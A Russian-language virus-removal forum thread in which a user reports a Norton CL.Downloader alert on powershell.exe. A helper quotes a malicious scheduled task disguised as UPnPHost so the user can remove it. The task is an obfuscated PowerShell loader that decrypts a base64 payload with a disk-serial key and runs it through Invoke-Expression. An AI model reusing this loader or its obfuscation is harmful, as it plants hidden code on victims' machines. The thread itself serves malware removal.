Нортон находит CL.Downloader!gen118

**Chimichanga** · 18.08.2019, 20:09

Добрый день!
Раз в 10 минут Нортон обнаруживает вот такую вещь:

Имя файла: CL.Downloader!gen118
Полный путь: Недоступно

____________________________

____________________________

На компьютерах, начиная с
Недоступно

Последнее использование
18.08.2019 в 19:35:18

Элемент автозагрузки
Нет

Запущен
Нет

Тип угрозы: Эвристический поиск вирусов. Обнаружение угрозы на основе эвристического анализа.

____________________________

CL.Downloader!gen118
Обнаружение

Неизвестно
Неизвестно, сколько пользователей Norton Community использовали этот файл.

Неизвестно
Время выпуска файла неизвестно.

Высокий
Уровень угрозы файла: высокий.

____________________________

Источник: внешний носитель

____________________________

Действия с файлом

Файл: powershell.exe (CL.Downloader!gen11

Попытка исправления не предпринималась
____________________________

Идентификационный отпечаток файла - SHA:
Недоступно
Идентификационный отпечаток файла - MD5:
Недоступно

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

**Info_bot** · 18.08.2019, 20:10

Уважаемый(ая) Chimichanga, спасибо за обращение на наш форум!

Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

**Vvvyg** · 18.08.2019, 22:38

Запустите HijackThis, расположенный в папке Autologger (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора))и пофиксите только эти строки:

Код:

O22 - Task: \Microsoft\Windows\UPnP\UPnPHost - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -Command "function dec([byte[]]$cb, [string]$pass){$pb = [System.Text.Encoding]::UTF8.GetBytes($pass);$s = $pb[0];$j=0;for($i = 0; $i -lt $cb.Count; $i++){if($j -ge $pb.Count){$j=0} $s = (23 -band $s -bor 152) -bxor $s;$cb[$i] = $cb[$i] -bxor $pb[$j] -bxor $s;$j++}return $cb;}$obj = gwmi win32_diskdrive | where {$_.DeviceID -eq '\\.\PHYSICALDRIVE0'} | select Model, Serialnumber;$d = dec ([System.Convert]::FromBase64String('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')) ($obj.Model + ' ' + $obj.Serialnumber);Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($d))"

Проблема должна быть устранена.